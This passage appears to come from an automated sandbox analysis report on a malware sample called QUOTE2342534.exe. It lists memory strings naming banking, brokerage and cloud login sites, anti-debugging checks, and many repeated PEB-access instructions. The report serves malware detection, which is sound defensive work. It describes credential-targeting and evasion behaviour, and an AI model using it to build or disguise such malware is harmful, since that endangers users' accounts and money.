            Source: 4-4-J4.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: firefox.exe, 0000000B.00000002.2520941156.0000021D292FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
            Source: 4-4-J4.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 4-4-J4.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 4-4-J4.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 4-4-J4.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 4-4-J4.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594205767.000000000094F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 4-4-J4.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 4-4-J4.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 4-4-J4.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E rdtsc 4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004176E3 LdrLoadDll,4_2_004176E3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B8158 mov eax, dword ptr fs:[00000030h]4_2_017B8158
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726154 mov eax, dword ptr fs:[00000030h]4_2_01726154
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726154 mov eax, dword ptr fs:[00000030h]4_2_01726154
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171C156 mov eax, dword ptr fs:[00000030h]4_2_0171C156
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B4144 mov ecx, dword ptr fs:[00000030h]4_2_017B4144
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01750124 mov eax, dword ptr fs:[00000030h]4_2_01750124
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CA118 mov ecx, dword ptr fs:[00000030h]4_2_017CA118
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CA118 mov eax, dword ptr fs:[00000030h]4_2_017CA118
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CA118 mov eax, dword ptr fs:[00000030h]4_2_017CA118
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CA118 mov eax, dword ptr fs:[00000030h]4_2_017CA118
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E0115 mov eax, dword ptr fs:[00000030h]4_2_017E0115
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017501F8 mov eax, dword ptr fs:[00000030h]4_2_017501F8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F61E5 mov eax, dword ptr fs:[00000030h]4_2_017F61E5
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0179E1D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E61C3 mov eax, dword ptr fs:[00000030h]4_2_017E61C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E61C3 mov eax, dword ptr fs:[00000030h]4_2_017E61C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171A197 mov eax, dword ptr fs:[00000030h]4_2_0171A197
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171A197 mov eax, dword ptr fs:[00000030h]4_2_0171A197
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171A197 mov eax, dword ptr fs:[00000030h]4_2_0171A197
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01760185 mov eax, dword ptr fs:[00000030h]4_2_01760185
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DC188 mov eax, dword ptr fs:[00000030h]4_2_017DC188
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DC188 mov eax, dword ptr fs:[00000030h]4_2_017DC188
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C4180 mov eax, dword ptr fs:[00000030h]4_2_017C4180
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C4180 mov eax, dword ptr fs:[00000030h]4_2_017C4180
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174C073 mov eax, dword ptr fs:[00000030h]4_2_0174C073
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01722050 mov eax, dword ptr fs:[00000030h]4_2_01722050
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6050 mov eax, dword ptr fs:[00000030h]4_2_017A6050
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B6030 mov eax, dword ptr fs:[00000030h]4_2_017B6030
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171A020 mov eax, dword ptr fs:[00000030h]4_2_0171A020
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171C020 mov eax, dword ptr fs:[00000030h]4_2_0171C020
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A4000 mov ecx, dword ptr fs:[00000030h]4_2_017A4000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C2000 mov eax, dword ptr fs:[00000030h]4_2_017C2000
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171C0F0 mov eax, dword ptr fs:[00000030h]4_2_0171C0F0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017620F0 mov ecx, dword ptr fs:[00000030h]4_2_017620F0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0171A0E3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A60E0 mov eax, dword ptr fs:[00000030h]4_2_017A60E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017280E9 mov eax, dword ptr fs:[00000030h]4_2_017280E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A20DE mov eax, dword ptr fs:[00000030h]4_2_017A20DE
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E60B8 mov eax, dword ptr fs:[00000030h]4_2_017E60B8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E60B8 mov ecx, dword ptr fs:[00000030h]4_2_017E60B8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B80A8 mov eax, dword ptr fs:[00000030h]4_2_017B80A8
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172208A mov eax, dword ptr fs:[00000030h]4_2_0172208A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C437C mov eax, dword ptr fs:[00000030h]4_2_017C437C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A035C mov ecx, dword ptr fs:[00000030h]4_2_017A035C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A035C mov eax, dword ptr fs:[00000030h]4_2_017A035C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EA352 mov eax, dword ptr fs:[00000030h]4_2_017EA352
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C8350 mov ecx, dword ptr fs:[00000030h]4_2_017C8350
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A2349 mov eax, dword ptr fs:[00000030h]4_2_017A2349
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171C310 mov ecx, dword ptr fs:[00000030h]4_2_0171C310
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01740310 mov ecx, dword ptr fs:[00000030h]4_2_01740310
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A30B mov eax, dword ptr fs:[00000030h]4_2_0175A30B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A30B mov eax, dword ptr fs:[00000030h]4_2_0175A30B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A30B mov eax, dword ptr fs:[00000030h]4_2_0175A30B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E3F0 mov eax, dword ptr fs:[00000030h]4_2_0173E3F0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E3F0 mov eax, dword ptr fs:[00000030h]4_2_0173E3F0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E3F0 mov eax, dword ptr fs:[00000030h]4_2_0173E3F0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017563FF mov eax, dword ptr fs:[00000030h]4_2_017563FF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017303E9 mov eax, dword ptr fs:[00000030h]4_2_017303E9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE3DB mov eax, dword ptr fs:[00000030h]4_2_017CE3DB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE3DB mov eax, dword ptr fs:[00000030h]4_2_017CE3DB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE3DB mov ecx, dword ptr fs:[00000030h]4_2_017CE3DB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CE3DB mov eax, dword ptr fs:[00000030h]4_2_017CE3DB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C43D4 mov eax, dword ptr fs:[00000030h]4_2_017C43D4
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C43D4 mov eax, dword ptr fs:[00000030h]4_2_017C43D4
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DC3CD mov eax, dword ptr fs:[00000030h]4_2_017DC3CD
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A3C0 mov eax, dword ptr fs:[00000030h]4_2_0172A3C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017283C0 mov eax, dword ptr fs:[00000030h]4_2_017283C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A63C0 mov eax, dword ptr fs:[00000030h]4_2_017A63C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01718397 mov eax, dword ptr fs:[00000030h]4_2_01718397
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01718397 mov eax, dword ptr fs:[00000030h]4_2_01718397
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01718397 mov eax, dword ptr fs:[00000030h]4_2_01718397
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E388 mov eax, dword ptr fs:[00000030h]4_2_0171E388
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E388 mov eax, dword ptr fs:[00000030h]4_2_0171E388
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E388 mov eax, dword ptr fs:[00000030h]4_2_0171E388
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174438F mov eax, dword ptr fs:[00000030h]4_2_0174438F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174438F mov eax, dword ptr fs:[00000030h]4_2_0174438F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D0274 mov eax, dword ptr fs:[00000030h]4_2_017D0274
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724260 mov eax, dword ptr fs:[00000030h]4_2_01724260
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171826B mov eax, dword ptr fs:[00000030h]4_2_0171826B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171A250 mov eax, dword ptr fs:[00000030h]4_2_0171A250
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726259 mov eax, dword ptr fs:[00000030h]4_2_01726259
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA250 mov eax, dword ptr fs:[00000030h]4_2_017DA250
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA250 mov eax, dword ptr fs:[00000030h]4_2_017DA250
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A8243 mov eax, dword ptr fs:[00000030h]4_2_017A8243
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A8243 mov ecx, dword ptr fs:[00000030h]4_2_017A8243
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171823B mov eax, dword ptr fs:[00000030h]4_2_0171823B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302E1 mov eax, dword ptr fs:[00000030h]4_2_017302E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A2C3 mov eax, dword ptr fs:[00000030h]4_2_0172A2C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302A0 mov eax, dword ptr fs:[00000030h]4_2_017302A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017302A0 mov eax, dword ptr fs:[00000030h]4_2_017302A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov ecx, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B62A0 mov eax, dword ptr fs:[00000030h]4_2_017B62A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E284 mov eax, dword ptr fs:[00000030h]4_2_0175E284
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E284 mov eax, dword ptr fs:[00000030h]4_2_0175E284
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0283 mov eax, dword ptr fs:[00000030h]4_2_017A0283
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175656A mov eax, dword ptr fs:[00000030h]4_2_0175656A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728550 mov eax, dword ptr fs:[00000030h]4_2_01728550
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728550 mov eax, dword ptr fs:[00000030h]4_2_01728550
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
